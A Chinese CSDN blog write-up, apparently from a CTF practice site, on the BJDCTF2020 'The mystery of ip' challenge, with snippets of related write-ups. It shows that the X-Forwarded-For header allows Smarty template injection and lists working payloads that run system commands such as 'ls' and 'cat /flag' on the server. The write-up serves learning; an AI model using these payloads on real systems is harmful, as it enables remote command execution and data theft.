[BJDCTF2020]The mystery of ip

最新推荐文章于 2024-06-29 16:50:32 发布

「已注销」

最新推荐文章于 2024-06-29 16:50:32 发布

阅读量1.4k

点赞数 1

本文链接：https://blog.csdn.net/qq_41628669/article/details/106133129

版权

知识点

SSTI
smarty

抓包，根据题目猜想X-Forwarded-For处可能有问题，测试了一下，存在模板注入

在这里插入图片描述

测试了一下，是smarty注入
smarty注入payload

{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} #本题payload

flag.php是假的，真正的flag在根目录下的flag文件中

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

[BJDCTF2020]The mystery of ip（ssti模板注入题目）

m0_55109452的博客

06-02

1836

项目场景：链接http://node3.buuoj.cn:29669/index.php 问题描述：观察页面找到三个链接，点开flag和hint看看，发现flag那个页面窃取了客户端的ip地址，这题的题目是“The mystery of ip”IP的神秘，看来解题是要从这里入手了。尝试解决：既然是窃取了IP，考虑是不是XFF或Client-IP这两个header，发现这个IP确实可控，0.0，感觉可以冲了我想到的第一个就是之前看到的sql注入的http头注入，但是也只是想想罢了，再看看其他方

buuctf-[BJDCTF2020]The mystery of ip

qq_42728977的博客

12-23

1419

[BJDCTF2020]The mystery of ip考点复现参考考点模板注入复现看到提示，说是怎么知道我的ip，那就说明应该是该请求头，然后模板注入，然后发现果然是。在请求头加入X-Forwarded-For: GET /flag.php HTTP/1.1 Host: node4.buuoj.cn:28006 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 A

1 条评论您还未登录，请先登录后发表或查看评论

buuctf题目the mystery of ip

最新发布

m0_65853019的博客

06-29

123

有三个按钮，flag点击后发现页面窃取客户端的IP地址，通过给出的github代码中的php文件发现可以通过XFF或Client-IP传入值。使用hackbar或BP。经系列测试知道是smart注入，Smarty是一个PHP的模板引擎，提供让程序逻辑和页面显示(HTML/CSS)代码分离的功能。

[bjdctf2020]the mystery of ip

03-16

这是一道关于IP地址的谜题，需要我们了解IP地址的基本知识和相关的网络协议。通过分析题目中给出的IP地址和端口号，我们可以推测出这是一道关于TCP/IP协议的题目。我们需要使用Wireshark等网络抓包工具来捕获网络...

【学习笔记 38】 buu [BJDCTF2020]The mystery of ip

weixin_43553654的博客

08-01

272

0x00 知识点 base_convert函数的利用 bin2hex和hex2bin函数代码审计 0x01 知识点详解 base_convert函数的作用？答：base_convert() 函数在任意进制之间转换数字。 bin2hex和hex2bin函数的作用？答：hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。 bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值。字符串可通过使用 pack() 函数再转换回去。 0x02 解题思路 1.打开网站就直接看

[BJDCTF2020]The mystery of ip(xff,smarty模板注入)

weixin_44110537的博客

10-04

512

首先服务器是如何知道我的ip的呢,猜想可能是XFF或Client-IP这两个header. 抓个包发现是通过XFF smarty模板注入参考了一下这位师傅的博客. PHP的模板注入（Smarty模板）看看flag.php源代码是啥. <?php require_once('header.php'); require_once('./libs/Smarty.class.php'); $smarty = new Smarty(); if (!empty($_SER

[BJDCTF2020]The mystery of ip 1

feng的博客

11-16

1141

WP 进入环境，发现还是那个熟悉的页面，hint里给我们提示了ip，在flag.php那里尝试xff头，发现成功回显，说明回显的点在xff头那里。猜测是SSTI。我输入{{7*‘7’}}，回显了49，我以为是Twig的模板注入，把payload扔进去发现报错了。把报错信息扔到谷歌里面查了一下，发现这是是Smarty的SSTI。参考文章如下： Smarty SSTI 最终采用if的方法成功得到了flag： {if system("cat /flag")}{/if} 然后看了一下WP，发现这样直接出了。

[BJDCTF2020]The mystery of ip （每日一题）

qq_51684648的博客

09-09

297

[BJDCTF2020]The mystery of ip （每日一题） 1，打开网页，看到了flag的标识，点进去发现： 2，想起伪造ip，尝试抓包，伪造ip,发现没什么变化 3，尝试改成本地ip，发现ip值变化，也许可以在这里做文章 4，将ip改为{7*8}，被当成语句执行了 5，尝试用系统命令{system(“ls”)}，发现可以执行，构造{system(“cat /flag”)}，得到flag ...